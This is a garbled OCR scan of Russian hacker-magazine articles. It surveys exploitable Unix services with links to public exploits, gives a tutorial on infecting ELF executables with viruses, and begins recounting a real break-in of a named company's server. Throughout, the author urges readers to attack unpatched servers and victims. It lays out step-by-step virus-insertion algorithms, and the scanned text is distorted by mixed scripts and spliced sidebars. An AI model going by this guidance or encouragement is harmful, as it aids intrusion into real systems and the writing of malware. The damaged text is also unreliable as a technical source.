FreeBSD существует специальный 
эксплоит, переполняющий буфер в 
сервисе. Итог - удаленный root на уяз- 
вимой системе. Сейчас такой демон в 
глобале не встретить, раритетные сис- 
темы существуют разве что в локаль- 
ной сети какой-нибудь фирмы. 

Служба постепенно замещается за- 
щищенным SSHD, поэтому судьба tel- 
netd предрешена. Думаю, через пару 
лет ты вообще забудешь, что когда-то 
существовал подобный демон. А пока 
- атакуй сервера, админы которых не 
позаботились о безопасности. 


Если ты 
пробил за- 
СА чай WWW - ИСТОЧНИК ВСЕХ БЕД 
маршрутиза- m= Обратимся к самой популярной 
тора, ищи глобальной службе - WWW. Думаю, 
бажные сер- б 
ВИ не стоит говорить, что наиболее часто 
р се- используемый демон в unix-like-one- 
ти. Поверь ы 
res рационках называется Apache. Нес 
много :). мотря на его относительную стабиль- 
ность баги в Apache существуют. Точ- 
нее, не в самом сервере, а в его мно- 
гочисленных модулях. Начнем с само- 
го популярного - mod_php. Баг go- 
Чтобы уз- вольно старый, но грех о нем не 
Bee вспомнить. К тому же, бажные версии 
подключены — Модулей можно встретить в сети GO 
ры сих пор. Итак, ошибка в компоненте 
равь прос- заключается в обработке внешних па- 
той и раметров. Если хакер пересылал хит- 
запрос. Ин- в 
формация о рый запрос любому скрипту, модуль 
библиотеках — мог открыть Shell с командным интерп- 
ео ретатором. Так и происходило, прав- 
«Server:». да, перед этим эксплоит долго переби- 


рал запросы. Еще один баг затаился в 
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Бедствие от компрессии 


Взломать NetBSD - задача не из легких 


протоколе OpenSSL. Хакеры быстро 
реализовали эксплоит для moc_ssl, 
который позволял брать права WWW- 
сервера. После длительного ажиота- 
жа многие админы обновили библио- 
теки SSL, в результате чего уязви- 
мость потеряла свою остроту. Рари- 
тетный эксплоит называется 
OpenFuck, вторую его версию ты мо- 
жешь скачать по адресу packeistormse- 
curity.org/0304-exploits/OpenFuckV2.c. 

Хочешь баг посвежее? Держи! 
Брешь актуальна для связки Apache 
2.х с mod_perl. Модуль, позволяющий 
добиться акселерации при запуске 
СС|-сценариев, содержит утечку важ- 
ных файловых дескрипторов. Сейчас 
я наглядно объясню, к чему это может 
привести. Для эксплуатирования 
жертвы хакеру придется добиться ло- 
кальных привилегий. Это нужно для 
того, чтобы иметь доступ к WWW-kata- 
логу и заливке скрипта (думаю, по- 
дойдут права nobody в web-shell’e). 
Взломщик пишет сценарий, который 
рождает подпроцесс, а затем останав- 
ливает httpd. Затем потомок становит- 
ся демоном, имитирующим работу 
Web-cepBepa. На все запросы клиентов 
он отвечает, что админа поимели :). По- 
добное описание всех шагов хакера 
можно найти на странице млм. еси у 
lab.ru/42355.html. 

Давай теперь поговорим о других 
библиотеках. Не так давно стал уяз- 
BUM компонент Mod_gzip 
(www.security.nnov.ru/files/85mod_gzip.c), кото- 
рый служит для сжатия контента пе- 
ред передачей. Уязвимость была об- 
наружена в конце лета прошлого го- 
да. Через банальное переполнение 
буфера злоумышленник может по- 
рождать процессы под правами 
nobody. Для этого хакеру требова- 
лось послать определенные данные, 
включающие параметр Accept- 
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Encoding. Неважно, на 
какой системе крутит- 
ся Apache - баг таит- 
ся как в FreeBSD, так 
ив RedHat, Mandrake, 
SuSE. Все потому, что 
эксплоит снабжен 
брутффорсом, который 
каждый раз переби- 
рает адрес возврата. 
В спучае его успеш- 
ного определения 
злоумышленник по- 
лучит интерактивный 
shell. При этом версия 
модуля не должна 
быть выше 1.3.26. По- 
разительно, но даже 
сейчас баг актуален. 
За примерами далеко 
ходить не надо, прос- 
то взгляни на скрин- 
wor. 

Бывает, что и в Ca- 
Mom Apache встреча- 
ются баги. Даже при 
отсутствии дополни- 
тельных библиотек. 
Это показала критическая уязвимость 
в OpenBSD/NetBSD, позволяющая 
брать shell через дырявый httpd 
(www.security.nnov.ru/files/apache-nosejob.c). 
Правда, сейчас найти уязвимый Cep- 
вер практически невозможно. 


ДРУГИЕ СЛУЖБЫ 

и Я перечислил основные службы, 
большинство из которых установле- 
ны практически на каждом сервере. 
Однако существуют и другие уязви- 
мые сервисы, пусть и не такие важ- 
ные. Тебе придется их поискать в раз- 
личных сетях, а после этого нещадно 
взломать :). 


@. IRC. Демоны ircd расположены 
на многих машинах, а их стойкость к 
атакам оставляет желать лучшего. 
Например, недавно был обнаружен 
баг в популярном hybrid-ircd, кото- 
рый позволяет удаленно убить сер- 
вис. Эксплоит публичный 
(addict3d.org/index.php?page=viewarticle&type= 
security&lD=!416), но перед тем как его 
скомпилировать, тебе придется исп- 
равить ошибки в исходном коде. Эта- 
кая защита от скрипткидисов. Рас- 
сказывать о том, как править исход- 
ник, я не буду - додумаешься сам. 
Подскажу лишь, что тебе придется 
перенести объявления переменных 
из середины процедуры в ее начало. 
После того как ты скомпилишь 
эксплоит, натрави его на какую-ни- 
будь жертву (сервер, где установлен 
гибрид) и жди результата. Долго 
ждать не придется: непропатченный 
демон быстро уйдет в core dump. 

@. CVS. Ты никогда не мечтал взло- 
мать разработчиков софта? Служба 
CVS создана для синхронизации ис- 
ходных кодов, поэтому часто ставится 
на сервера разработчиков какого-ли- 
бо проекта. Хакеры нашли в демоне 


склонность к переполнению буфера. 
Это показал несложный анализ стро- 
ки, посылаемой серверу. Багоискате- 
ли установили, что выделение памяти 
происходит не под всю строку, а с не- 
которым запасом. Таким образом, гра- 
мотно составленный запрос позволя- 
ет повторно обратиться к функции 
дырявого CVS. С каждым вызовом 
злоумышленник может перезаписать 
память произвольными данными, а 
затем обратиться к ним. Думаю, ты 
понимаешь, что произойдет, если ты 
обратишься к коду, открывающему 
shell и запускающему /bin/bash. Имен- 
но это и реализовано в эксплоите. 
Кстати, он является публичным и дав- 
но ждет тебя по адресу мил хакер.ги/ 
post/22450/cvs linux freebsd_HEAP.txt. 

©. mySQL. База данных всегда была 
лакомым кусочком для хакеров, ведь 
в ней можно найти ценную информа- 
цию. До последнего времени оля де- 
мона mysqld вообще не было экспло- 
итов, но хакеры терпеливо ждали. На- 
конец, был обнаружен изъян в све- 
жих релизах сервиса. Если хакер пош- 
лет демону хитрый авторизационный 
пакет, то функция сравнения неверно 
изымет из него пароль. Собственно, 
пароль в этом случае будет представ- 
лять собой строку нулевой длины, 


сравнение с которой даст положи- 
тельный результат. Как следствие, ха- 
кер сможет бороздить просторы БД 
без какой-либо авторизации :). Коман- 
да RuSH выпустила скомпилирован- 
ный тузОЕ-клиент, который позволя- 
ет логиниться к базе без знания паро- 
ля. Только вот версия демона должна 
быть 5.0 либо не превышать 4.1.3. 
Сливай туза! по адресу 
www.xakep.ru/post/23047/mysql_exploit.zip. 

@. Shoutcast. Я думаю, что многие 
из читателей слушают внутрисете- 
вое радио в своей локальной сети. 
Ты когда-нибудь задумывался, что 
служба Shoutcast, шлющая тебе звук 
по сетевым проводам, давно стоит на 
учете у хакеров? Если нет, то приш- 
ло время провести небольшой лик- 
без :). Баг таится в плохом анализе 
переменных icy-name и icy-desc, кото- 
рые отвечают за имя и описания пе- 
редаваемого файла. Никто же не ме- 
шает тебе воткнуть, скажем, /bin/sh 
вместо названия. Эксплоит можно 
найти по следующей ссылке 
wwwt.xakep.ru/post/14351/exploit.txt. Тести- 
руй эксплоит в своих локальных се- 
тях и наводи злободром на различ- 
ных серверах. 

@. Rsync. Частенько вместо FTP ag- 
мины используют утилиту rsync. He- 
давние релизы rsync содержат крити- 
ческий баг, который позволит тебе по- 
высить локальные привилегии. А все 
из-за отсутствия проверки в функции 
strcpy(), которую можно отыскать в ко- 
де socket.c. Баг актуален только для 
Linux, поэтому если тебе попалась Ma- 
шинка с навороченным ядром и ста- 
рым гзупс - все в твоих руках. Скачи- 
вай (www.xakep.ru/ post/21234/exploit.txt), ком- 
пилируй, запускай и наслаждайся ;). 
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возможно, это простая 
подделка. И никогда 
не забывай обращать- 
ся за помощью к сай- 
там по уязвимости - 
часто там содержатся 
дельные статьи по 
взлому. Прими к све- 
дению, что умный 
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ЗАРАЗА ДЛЯ НИКСОВ ) 


ВИРУСНЫЙ РАЗГУЛ ПОД UNIX 


рудно представить себе более простую штуку, чем компьютерный вирус. Тетрис и тот посложнее будет. Однако 

программирование вирусов вызывает у начинающих большие трудности: как внедрить свой код в файл, какие поля 
необходимо изменять, а какие лучше не трогать, чем отлаживать вирусы и можно ли использовать языки высокого уровня? 
Ответы на эти и многие другие вопросы, связанные с созданием вирей под *nix, я постарался дать в этом материале. 


ОПЕРАТИВНАЯ 


ОБСТАНОВКА 


и Первые вирусы, 


Некоторые 
администра- 
торы пола- 
гают, что 
под *nix ви- 
русов нет. 
Вирусы же 
придержи- 
ваются ино- 
го мнения. 


Некоторые 
пользовате- 
ли в жела- 
нии почув- 
ствовать се- 
бя богом по- 
долгу рабо- 
тают в сис- 
теме на из- 
под root'a. 
Вирусы и 
хакеры лю- 
бят таких 
пользовате- 
лей :). 


поражающие ELF-cpan- 


лы (основной формат 


исполняемых файлов под *nix), были 
зарегистрированы в конце 90-х, а те- 
перь их популяция насчитывает свы- 
ше полусотни представителей (см. 
коллекцию вирусов на \х.пеих.ого). 
Антивирусная Энциклопедия Евге- 
ния Касперского (WW om/virus 
lisLhtml?id=3166) сообщает лишь о четыр- 
надцати из них, что наводит на серь- 
езные размышления о качестве AVP 
и добросовестности его создателей. 

По умолчанию, UNIX запрещает моди- 
сффикацию исполняемых срайлов, и ус- 
пешное распространение вирусов воз- 
можно только на уровне root, который 
либо присваивается зараженному дфай- 
Лу администратором, либо самостоя- 
тельно захватывается вирусом через 
дыры в ядре системы. При правильной 
политике разграничения доступа и 
оперативном наложении заплаток уг- 
роза вирусного заражения сводится к 
минимуму. К тому же, времена тоталь- 
ного обмена сосртом давно позади. 
Сейчас уже никто не копирует испол- 
няемые срайлы друг у друга, скачивая 
их напрямую из интернета. Даже если 
вирус ухитрится поразить централь- 
ный сервер, дальше первого поколе- 
ния его распространение не пойдет и 
вторичные заражения будут носить 
единичный характер. 

Файловые вирусы уже неактуальны, 
и отсутствие крупных эпидемий наг- 
лядно подтверждает этот CPakT. Тем 
не менее, накопленные методики 
внедрения отнюдь не стали бесполез- 
ными - без них жизнь троянов и сис- 
тем удаленного администрирования 
была бы весьма недолгой. Захватить 
управление атакуемым компьютером 
и заполучить права root'a - все рав- 
но что бросить зернышко на раска- 
ленный ассральт. Хакер должен уко- 
рениться в системе, цепляясь за все 
исполняемые срайлы, что встретятся 
ему на пути. Но и тогда он не может 
быть ни в чем уверен, поскольку су- 
ществует такое понятие, как резерв- 
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ное копирование, позволяющее вос- 
становить пораженную систему, как 
бы глубоко вирус ни был внедрен. 

Считается, что вирусы, внедряющие- 
ся в исходные тексты, более живучи, 
однако в действительности это не так. 
Исходные тексты требуются неболь- 
шому числу пользователей, а девело- 
перы активно используют системы 
контроля версий, отслеживающих це- 
лостность программного кода и поз- 
воляющих делать многоуровневый 
"откат". Было зарегистрировано нес- 
колько попыток заражения исходных 
текстов операционной системы LINUX 
и сервера Apache, но все они с трес- 
ком провалились. 

То же самое относится и к вирусам, 
обитающим в интерпретируемых 
скриптах, таких, как sh, Perl, РНР. В 
*nix скрипты вездесущи и их модисри- 
кация по умолчанию разрешена, что 
создает благоприятные условия для 
размножения вирусов. Если бы поль- 
зователи обменивались скриптами, 
юниксоидный мир погрузился бы в 
эпоху ранней MS-DOS, когда новые 
вирусы выходили едва ли не каждый 
день, а так вирусы остаются внутри 
пораженного компьютера, не в силах 
вырваться наружу. 

Разумеется, вирус может распрост- 
раняться и через интернет, но тогда 
это будет уже не вирус, а червь. Неко- 
торые исследователи считают червей 
самостоятельными организмами, не- 
которые - разновидностью вирусов, 
но, как бы там ни было, черви - тема 
отдельного разговора. 


ЯЗЫК РАЗРАБОТКИ 
и Настоящие хакеры признают 
только один, максимум, два языка -С 


и Ассемблер, причем последний из них 
стремительно утрачивает свои пози- 
ции, уступая место Бейсику, Delphi и 
прочей дряни, на которой элегантный 
вирус невозможно создать в принципе. 

А что на счет Си? С эстетической 
точки зрения, это - чудовищный вы- 
бор, и вирусмэйкеры старой школы 
его не прощают (однако написать код 
на ассемблере, сравнимый с тем, что 
выдают современные оптимизирую- 
щие С-компиляторы вроде Microsoft C 
Compiler, - geno для новичка не такое 
уж простое - прим. AvaLANche'a). С 
другой стороны, будучи низкоуровне- 
вым системно-ориентированным язы- 
ком, Си неплохо походит для разра- 
ботки вирусов, хотя от знания Ассемб- 
лера это все равно не освобождает. 

Код, генерируемый компилятором, 
должен: быть полностью перемещае- 
мым (то есть независимым от базово- 
го адреса загрузки), не модифициро- 
вать никакие ячейки памяти, за иск- 
лючением стекового пространства, и 
не использовать стандартные меха- 
низмы импорта функций, либо подк- 
лючая все необходимые библиотеки 
самостоятельно, либо обращаясь в 
native-API. Этим требованиям удовлет- 
воряет подавляющее большинство 
компиляторов, однако от программис- 
та тоже кое-что потребуется. 

Нельзя объявлять главную функ- 
цию программы как main: встретив та- 
кую, линкер внедрит в файл start-up 
код, который вирусу не нужен. Нельзя 
использовать глобальные или стати- 
ческие переменные: компилятор при- 
нудительно размещает их в сегменте 
данных, но у вирусного кода не может 
быть сегмента данных! Даже если ви- 
рус захочет воспользоваться сегмен- 


TOM пораженной программы, он будет 
должен, во-первых, самостоятельно 
определить адрес его "хвоста", а, во- 
вторых, растянуть сегмент до необхо- 
димых размера. Все это тривиально 
реализуется на Ассемблере, но для 
компилятора оказывается чересчур 
сложной задачей. Кроме того, нужно 
хранить все данные только в локаль- 
ных переменных, задавая строковые 
константы в числовом виде. Если на- 
писать char х[] = "hello, world", ковар- 
ный компилятор сбросит "hello, world" 
в сегмент данных, а затем динамичес- 
ки скопирует его в локальную пере- 
менную х. Можно сделать так: x[O]="'h', 
х[1]='е', х[2]='"... или преобразовать 
char в int, осуществлять присвоение 
двойными словами, не забывая о том, 
что младший байт должен распола- 
гаться по наименьшему адресу, что 
разворачивает строку задом наперед. 
Нельзя использовать никакие биб- 
лиотечные функции, если только не 
уверен в том, что они полностью 
удовлетворяют всем вышеперечис- 
ленным требованиям. Системные 
функции обычно вызываются через 


интерфейс native-API, также извест- 
ный под именем уз-са! (в Linux-no- 
добных системах за это отвечает пре- 
рывание INT 80h, другие системы 
обычно используют дальний вызов 
по селектору семь, смещение ноль). 
Поскольку системные вызовы варьи- 
руются от одной системы к другой, это 
ограничивает среду обитания вируса 
и при желании он может прибегнуть к 
внедрению в таблицу импорта. 
Откомпилировав полученный срайл, 
мы получим объектник и ругательство 


компилятора по поводу отсутствия main. 


Остается только слинковать его в дво- 
ичный 32.64-разрядный срайл. Естест- 
венно, внедрять его в жертву придется 
вручную, так как системный загрузчик 
откажется обрабатывать такой файл. 


СРЕДСТВА АНАЛИЗА, 
ОТЛАДКИ И ПЛАГИАТА 

Какой вирусмэйкер удержится от 
соблазна пополнить свой заплечный 
рюкзак за чужой счет, выдирая идеи 
и алгоритмы из тел попавших к нему 
вирусов? Чаще всего вирусами обме- 
ниваются тет-а-тет. Коллекции, най- 


ПЕРЕХВАТ УПРАВЛЕНИЯ ПУТЕМ МОДИФИКАЦИИ 


ТАБЛИЦЫ ИМПОРТА 


wa ai 


денные в сети, для опытных хакеров 
не представляют никакого интереса, 
поскольку набираются из открытых 
источников, но для начинающих ис- 
следователей это - настоящий клад. 

Если исходные тексты вируса отсут- 
ствуют (кривые дизассемблерные 
листинги, выдаваемые за божествен- 
ное откровение, мы в расчет не бе- 
рем), препарировать двоичный код 
вируса приходится самостоятельно. 
Тут-то нас и поджидает одна большая 
проблема. Дизассемблер всех времен 
и народов IDA Pro не приспособлен 
для работы с ELF-Bupycamu, посколь- 
ку отказывается загружать файлы с 
искаженным Section header'om (а 
большинство вирусов никак не кор- 
ректируют его после заражения!). 
Других достойных дизассемблеров, 
переваривающих ELF-qpopmat, мне об- 
наружить так и не удалось (а самому 
писать лень). За неимением лучших 
идей приходится возиться с НЕХ-ре- 
дакторами (например, с тем же 
HIEW'om), разбираясь со служебными 
структурами сфайла вручную. 

С отладчиками дело обстоит еще ху- 
же. Фактически под *nix существует 
всего один более или менее самостоя- 
тельный отладчик прикладного уров- 
ня - gdb (GNU Debugger), являющий- 
ся фундаментом для большинства ос- 
тальных. Простейшие антиотладоч- 
ные приемы, нарытые в хакерских ма- 
нуалах времен первой молодости MS- 
DOS, пускают gdb в разнос или позво- 
ляют вирусу вырваться из-под его 
контроля, поэтому отлаживать вирус- 
ный код на рабочей машине категори- 
чески недопустимо и лучше исполь- 
зовать для этой цели эмулятор, такой, 
как ВОСН$. Особенно предпочтитель- 
ны эмуляторы, содержащие интегри- 
рованный отладчик, обойти который 
вирусу будет очень тяжело, а, в идеа- 
ле, вообще невозможно (BOCHS та- 
кой отладчик содержит). Кстати гово- 
ря, совершенно необязательно для 
исследования Е Е-вирусов устанавли- 
вать *nix. Эмулятора для этих целей 
будет более чем достаточно. 


ELF 
Структура ELF-qpamnos (ELF - 
Execution & Linkable Format) umeet 


Малочис- 
ленность 
вирусов в 
мире *nix 
компенси- 
руется от- 
сутствием 
нормальных 
антивиру- 
сов. 


IE и IRC - 
вот основ- 
ные источ- 
ники для 
пополнения 
твоей кол- 
лекции ви- 
русов. 


Открытость 
ELF-qopma- 
та вкупе с 
доступ- 
ностью ис- 
ходных 
текстов 
системного 
загрузчика 
значитель- 
но упроща- 
ет констру- 
ирование 
вирусов под 
*nix. 
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ЗАРАЗА ДЛЯ НИКСОВ ) 


Создание 
вирусов не 
преследует- 
ся по зако- 
ну. По зако- 
ну пресле- 
дуется соз- 
дание вре- 
доносных 
программ. 


Из десятка 
возможных 
методов 
внедрения в 
ЕЕ -файлы 
вирусописа- 
телям уда- 
лось осво- 
ить лишь 
два-три, так 
что на от- 
сутствие 
творческого 
простора 
жаловаться 
не прихо- 
дится. 


*nix- и 
Windows- 
вирусы 
строятся по 
одним и тем 
же принци- 
пам, причем 
УМХ-виру- 
сы даже 
проще. 


много общих черт с PE (Portable 
Execution) - основным исполняемым 
форматом платформы Windows 9x и 
МТ, концепции их заражения весьма 
схожи, хотя и реализуются различ- 
ным образом. 

ЕЁЕ-срайл состоит из ЕЁЕ-заголовка 
(ELF-header), описывающего OCHOB- 
ные особенности поведения сфайла, 
заголовка программной таблицы (рго- 
gram header table) и одного или нес- 
кольких сегментов (Segment), содер- 
жащих код, инициализированные/не- 
инициализированные данные и про- 
чие структуры. 

Каждый сегмент представляет собой 
непрерывную область памяти со свои- 
ми атрибутами доступа (кодовый сег- 
мент обычно доступен только на ис- 
полнение, сегменты данных как мини- 
мум доступны на чтение, а при необхо- 
димости еще и на запись). Пусть слово 
"сегмент" не вводит тебя в заблужде- 
ние: ничего общего с сегментной мо- 
делью памяти тут нет. Большинство 
32-битных реализаций UNIX'a помеща- 
ют все сегменты ЕЁ Е-сфайла в один 4- 
гигабайтный "процессорный" сегмент 
(так называемый плоская (flat) модель 
памяти). В памяти все ЕГЕ-сегменты 
должны выравниваться по величине 
страницы (на х86, равной 4 Кб), но 
непосредственно в самом ЕЕ -срайле 
хранятся в невыравненном виде, 
вплотную прижимаясь друг к другу. 
Сам ELF-3aronosok и program header в 
первый сегмент не входят (ну, фор- 
мально не входят), но совместно гру- 
зятся в память, при этом начало сег- 
мента следует непосредственно за 
концом program header'a и по границе 
страницы не выравнивается! 

Последним из всех идет заголовок 
таблицы секций (section header table). 
Для исполняемых сфайлов он необя- 
зателен и реально используется 
только в объектниках. Еще в нем нуж- 
даются отладчики - исполняемый 
файл с изуродованным section header 
table не отлаживается ни gdb, ни про- 
изводными от него отладчиками, хотя 
нормально обрабатывается операци- 
онной системой. 

Сегменты естественным образом де- 
лятся на секции. Типичный кодовый 
сегмент состоит из секций .init (проце- 
дуры инициализации), .рЁ (секция 
связок), .text (основой код програм- 
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мы) и .finit (процедуры финализации), 
атрибуты которых описываются в $ес- 
tion header'e. Загрузчик операцион- 
ной системы ничего не знает о секци- 
ях, игнорируя их атрибуты и загружая 
весь сегмент целиком. Тем не менее, 
для сохранения работоспособности 
зараженного файла под отладчиком 
вирус должен корректировать оба за- 
головка сразу - как program header, 
так и section header. 

Основные структуры ELF находятся 
в файле /usr/include/elf.h. 

За более подробной информацией 
обращайся к оригинальной специофи- 
кации на Е.Е -файл "Executable and 
Linkable Format - Portable Format 
Specification", составленной, естест- 
венно, на английском языке. 


МЕТОДЫ ЗАРАЖЕНИЯ 
Простейший и наиболее универ- 
сальный метод заражения сводится к 
поглощению оригинального срайла 
вирусом. Вирус просто дописывает 
оригинальный файл к своему телу как 
оверлей, а для передачи управления 
жертве проделывает обратный про- 
цесс: пропускает первые virus_size 
байт своего тела (что обычно осуще- 
ствляется функцией seek), считывает 
оставшийся «хвост» и записывает 
его во временный cpamn. Присваивает 
атрибут исполняемого и делает ему 


ехес, предварительно расщепив ма- 
теринский процесс функцией fork. 
После завершения работы файла- 
жертвы вирус удаляет временный 
файл с диска. 

Описанный алгоритм элементарно 
реализуется на любом языке програм- 
мирования вплоть до Бейсика и при- 
годен как для исполняемых файлов, 
так и для скриптов. Однако ему прису- 
щи и недостатки. Он медлителен и не- 
элегантен, требует возможности запи- 
си на диск и прав установки атрибута 
"исполняемый". Кроме того, появле- 
ние посторонних файлов на диске не 
может долго оставаться незамечен- 
ным, и участь вируса заранее предре- 
шена. Поэтому большинство вирусов 
не используют такую методику, а 
предпочитают внедряться в конец 
последнего сегмента файла, расши- 
ряя его на необходимую величину. 


СТРУКТУРА 
ИСПОЛНЯЕМОГО 


ЕГЕ-ФАЙЛА 


Под последним здесь подразумева- 
ется последний подходящий сегмент 
файла, чем, как правило, является 
сегмент инициализированных данных, 
за которым следует сегмент неиници- 
ализированных данных, занимающий 
ноль байт дисковой памяти. Конечно, 
можно внедриться и в него, но это бу- 
дет выглядеть как-то странно. 

Приблизительный алгоритм внедре- 
ния в конец ЕЁЕ-файла выглядит сле- 
дующим образом: 

©. вирус открывает срайл и, считы- 
вая его заголовок, убеждается, что 
это действительно ELF; 

@. просматривая Program Header 
Table, вирус отыскивает последний 
сегмент с атрибутом PL_LOAD; 

©. найденный сегмент "распахивает- 
ся" gO конца сайла и увеличивается на 
величину, равную размеру тела вируса, 
что осуществляется путем синхронной 
коррекции полей p_filez и p_memz; 

Ф. вирус дописывает себя в конец 
заражаемого срайла; 

©. для перехвата управления вирус 
корректирует точку входа в файл 
(e_entry) либо же внедряет в истинную 
точку входа jmp на свое тело (впрочем, 
методика перехвата управления - тема 
отдельного долгого разговора). 

Теоретически вирус может внед- 
риться в середину файла, дописав 
свое тело в конец кодового сегмента 
и сдвинув все последующие сегменты 
вниз, однако при этом ему потребует- 
ся скорректировать все указатели на 
ячейки сегмента данных, поскольку 
после заражения они будут распола- 
гаться по совершенно другим адре- 
сам. Как вариант, перед передачей уп- 
равления программе-носителю вирус 
может "подтянуть" опущенные сег- 
менты вверх, вернув их на свое закон- 
ное место, HO, если файл содержит 
перемещаемые элементы или прочие 
служебные структуры данных, вирусу 
их придется скорректировать тоже, в 
противном случае системный загруз- 
чик необратимо исказит зараженный 
cpain и тот откажет в работе. Все это 
слишком сложно для начинающих, а 
потому вирусы подобного типа не по- 
лучили большого распространения. 

Возможно внедриться в область, об- 
разованную выравниванием сегмен- 


тов в памяти. Поскольку границы сег- 
ментов всегда выравниваются на ве- 
личину 4 Кб, между концом кодового 
сегмента и началом сегмента данных 
обычно можно наскрести некоторое 
количество незанятого пространства. 
Впрочем, никаких гарантий на этот 
счет у нас нет, а потому для зараже- 
ния подходят далеко не все сфайлы. 

Ф. вирус открывает сфайл и, считы- 
вая его заголовок, убеждается, что 
это действительно ELF; 

@. просматривая program header 
table, вирус находит сегмент с атрибу- 
том PL_LOAD и (PAGE_SIZE % p_filesz) 
>= virus_size; если же такого сегмента 
нет, вирус отказывается от заражения; 

@. поля p_filez (размер на диске) и 
p_memsz (размер в памяти) соответ- 
ствующего сегмента увеличиваются 
на длину тела вируса; 

Ф. none p_offset и факультативно 
sh_offset всех последующих сегмен- 
тов/секций увеличивается на длину 
тела вируса; 

@. поля e_phoff и факультативно 
e_shoff ЕЁЕ-заголовка увеличивается 
на величину тела вируса; 

©. вирус внедряет себя в конец выб- 
ранного сегмента; 

©. для перехвата управления вирус 
корректирует точку входа в файл 
(e_entry) либо же внедряет в истин- 
ную точку входа jmp на свое тело. 

Некоторые вирусы внедряются в об- 
ласть памяти между заголовком и на- 
чалом первого сегмента (во всяком 
случае, пытаются это сделать). Одна- 
ко большинство файлов "приклеива- 
ют" свой первый сегмент к заголовку, 
из-за чего для внедрения просто не 
остается свободного места. 


ОБЩАЯ СТРУКТУРА 
И СТРАТЕГИЯ ВИРУСА 

и Конкретная структура вирусного 
кода зависит от фантазии его разра- 
ботчика и выглядит приблизительно 
так же, как и в Windows-Bupycax. 
Обычно вначале находится расшиср- 
ровщик, за ним расположены модуль 
поиска подходящих жертв, инжектор 
вирусного кода и процедура передачи 
управления файлу-носителю. 

Для большинства ELF-Bupycos ха- 
рактерна следующая последователь- 
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Структура файла echo из комплекта поставки FreeBSD 4.5. Между секциями .finit и 
.rodata расположено всего лишь 1Eh байт данных, что недостаточно для размещения 


даже крошечного вируса 
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Структура файла Is из комплекта поставки RedHat 5.0. Между секциями .rodata и .data 


имеется 1000h байт, что с лихвой хватает для размещения даже высокотехнологично- 
го вируса 


Типичная структура вирусного кода 


ность системных вызовов: SyS_open 
(mov eax, O5h/int 80h) открывает 
файл; sys_Iseek (mov eax,13h) переме- 
щает файловый указатель на нужное 
место; old_mmap (mov eax, 5Ah/int 
80h) проецирует срайл в память; 
sys_unmap (mov eax, 5Bh/int 80h) 
удаляет образ из памяти, записывая 
на диск все изменения, а SysS_close 
(mov eax, 06/int 80h) закрывает 
сам срайл. 

Техника проецирования (mapping) 
значительно упрощает работу с фай- 
лами большого объема. Теперь уже не 
нужно выделять буфер, копируя туда 
файл по кускам, и всю черную работу 
можно переложить на плечи операци- 
онной системы, сосредоточив свои 
усилия непосредственно на процессе 
заражения. Правда, при заражении 
файла протяженностью в несколько 
гигабайт (например, самораспаковыва- 
ющегося дистрибутива какого-то прог- 
раммного продукта) вирусу придется 
либо просматривать файл через "ок- 
но", проецируя в 4-гигабайтное agpec- 
ное пространство различные его час- 
ти, либо попросту отказаться от зара- 
жения, выбрав файл поприличнее. По- 
давляющее большинство вирусов 
именно так и поступает. 


ЗАКЛЮЧЕНИЕ 

и В ближайшее время, по-видимо- 
му, следует ожидать значительный 
рост численности ЕЁЕ-вирусов, ибо 
для этого имеются все условия. 
Всплеск интереса к Linux пошел не 
на пользу этой операционной сис- 
теме. В погоне за улучшениями ее 
превратили в решето, прикрутили 
"интуитивно понятный" графичес- 
кий интерфейс, но не предупредили 
пользователей, что прежде чем на- 
чать работать с системой, следует 
перелопатить тысячи страниц тех- 
нической документации и прочи- 
тать хотя бы пару умных книжек, в 
противном случае зараза не заста- 
вит себя долго ждать. Чем больше 
народу перейдет Ha *nix, тем боль- 
ше среди них окажется хакеров и 
вирусописателей, и тогда с *nix 
произойдет то же, что в свое время 
произошло с MS-DOS. Будут ли эти 
вирусы добродушными или злобны- 
ми, зависит от тебя. 
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Антивирус- 
ная Энцик- 
лопедия 
Касперского 
содержит 
большое ко- 


личество 
фактичес- 
ких ошибок 
в описании 
*nix-Bupy- 
сов. 


Многие 
*nix-BApyCcbi 
зависят от 
версии опе- 
рационной 
системы, 
поэтому 
всякий ис- 
следователь 
вынужден 
держать на 
своей ма- 
шине зо- 
опарк осей. 


Огромная 
коллекция 
*nix-BApycoB 
(и He толь- 
ко) имеется 
на 
vx.netlux.org. 
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ПРИМЕРЫ РЕАЛЬНЫХ ВЗЛОМОВ 


юбая теория должна быть закреплена практикой. Даже теория взлома. Если человек никогда не проверял свои 
знания на реальных серверах, то его нельзя назвать хакером. Позволь рассказать тебе, как хакеры ломают 
различные ресурсы. Но помни: повторять их действия опасно - старший брат следит за тобой! 


се взломы, представ- 


ленные в моем неболь- 


шом обзоре хакерских 


Все взломы 
реальны, но 
не забывай, 
что инфор- 
мация дана 

только для 

ознакомле- 

ния. 


Во время 
эпидемии 
сломать 
сервер с по- 
мощью 
эксплоита 
для 
mod_php 
было легко. 
Яркий тому 
пример - 
удаленная 
атака 
www.nikita.ru. 


этюдов, реальны и про- 
исходили в 2003-2004 
годах. Имена злоумышленников, по 
понятным причинам, не называю. В 
этом материале я старался охватить 
все методы атак. Итак, приступим! 


ВРЕМЯ ДЛЯ ИГР, ИЛИ ВЗЛОМ 
WWW.NIKITA.RU 

m= Любой игроман знает Никиту. Это 
не геймерский персонаж, а обычная 
игровая компания, создающая инте- 
ресные проекты. Я, например, любил 
погамать в Parkan, хроника империи. 
Быть может, ты знаешь эту фирму по 
другим игрушкам. Это не столь важно. 
Важно то, что год назад ресурс был 
взломан неизвестным хакером. Впро- 
чем, взлом выполнялся по тривиаль- 
ной схеме, даже скрипткиди мог за- 
нять место нашего героя и порулить 
сервером известной компании. Вот 
как это было. От нечего делать хакер 
сканировал подсеть, где обычно хос- 
тились сервера крупных компаний. 
Хостером являлся «Ростелеком», у ко- 
торого клиенты арендовали место в 
специальном серверном помещении. 
Хакер предполагал, что заказчики 
экономили на сисадминах, поэтому их 
сервера могли содержать дырки в 
своих демонах. Вскоре он засек при- 
мечательный сервер www.nikita.ru, ко- 
торый располагался в ростелекомовс- 
кой подсети. Внимание хакера прив- 
лекли отсутствие фаервола и много- 
численные сервисы, крутящиеся на 
этой машине. Понятно, чем больше 
сервисов, тем вероятность наличия 
бага, приводящего к удаленному 
взлому, выше. Атака происходила как 
раз в ту пору, когда в публичных ис- 
точниках появился эксплоит 7350fun, 
позволяющий поиметь WWW-NpaBa че- 
рез дырявый mod_php. Контент 
www.nikita.ru передавался браузеру 
через РНР-скрипты, поэтому стоило 
проверить версию модуля - быть мо- 
жет, хозяин машины даже не знал о 
